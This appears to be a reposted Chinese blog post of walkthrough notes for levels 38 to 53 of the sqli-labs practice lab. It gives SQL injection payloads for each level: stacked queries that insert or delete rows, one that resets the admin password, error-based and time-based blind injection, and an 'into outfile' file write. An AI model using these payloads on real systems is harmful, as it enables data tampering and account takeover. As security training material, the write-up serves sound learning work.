sqli-labs-master靶场训练笔记（38-53|boss战）

2024.2.4

level-38

（堆叠注入）

这题乍一看感觉又是来卖萌的，这不是和level-1一模一样吗

然后仔细看了一下源代码，根据 mysqli_multi_query 猜测这题的本意应该是堆叠注入

mysqli_multi_query() 是 PHP 中用于执行多个 SQL 查询语句的函数。这个函数允许你在一个连接中执行多个查询，并返回一个结果标识符，以便你可以逐个获取每个查询的结果。

函数的语法：
mysqli_multi_query(mysqli $connection, string $query)
$connection：一个有效的 mysqli 连接标识符。
$query：要执行的 SQL 查询语句。

返回值：

如果第一个查询语句执行成功，该函数返回一个结果标识符，你可以使用这个标识符来获取查询结果。如果第一个查询语句失败，该函数将返回 FALSE。
对于后续的查询语句，该函数将返回 TRUE 或 FALSE，具体取决于查询是否成功。

利用堆叠注入进行数据库的篡改

对users表中插入数据：

?id=1';insert into users(id,username,password) value(15,'2024','干杯！') -- a

为了方便这里的查询操作用cmd显示

对着level-1试了一下，果然不行

删除刚刚插入的数据

?id=1';delete from users where id=15 -- a

（level-38能有什么坏心思呢，他不过可以多线程操作罢了(๑＞ڡ＜)☆）

level-39

（堆叠注入）

和level-39一样，只是改成了数字型

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-40

（堆叠注入）

都是前几关玩剩下的

?id=-1') union select 1,2,3;delete from users where id=15 -- a

level-41

（堆叠注入）

和level-39一样

?id=-1 union select 1,2,3;delete from users where id=15 -- a

level-42

（堆叠注入）

普通用户利用堆叠注入可以修改管理员密码

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-43

（堆叠注入）

用 ') 闭合，其他和level-42一样

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-44

（堆叠注入）

和level-42一样

login_user=Dumb&login_password=Dumb';update users set password='123456' where username='admin' -- a&mysubmit=Login

level-45

和level-43一样

login_user=Dumb&login_password=Dumb');update users set password='123456' where username='admin' -- a&mysubmit=Login

level-46

提示传入sort变量

?sort=1

查看源码可以知道是一个数字型的order by注入

可以直接报错注入或者GETSHELL

?sort=1 and updatexml(1,concat('~',database(),'~'),1)

?sort=1 into outfile "D:/1.txt"

level-47

字符型的order by注入

?sort=1' and updatexml(1,concat('~',database(),'~'),1) -- a

level-48

数字型，时间盲注引发服务器报错（可能不是正解，但能用（doge））

?sort=1 and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-49

改成了字符型，用 ' 闭合，其他和level-48一样，一招鲜吃遍天

?sort=1' and if(mid((select+database()),1,1)='a',sleep(5),0) -- a

level-50

level-51

level-52

level-53

除了可以堆叠注入，均和上几关相同

看起来所有的 boss 都已经被你轻松斩于马下，去挑战独孤求败的自己吧

sqli-labs-master靶场训练笔记（54-65|决战紫禁之巓）-CSDN博客https://blog.csdn.net/ymy13326056686/article/details/136039776

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/674682.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！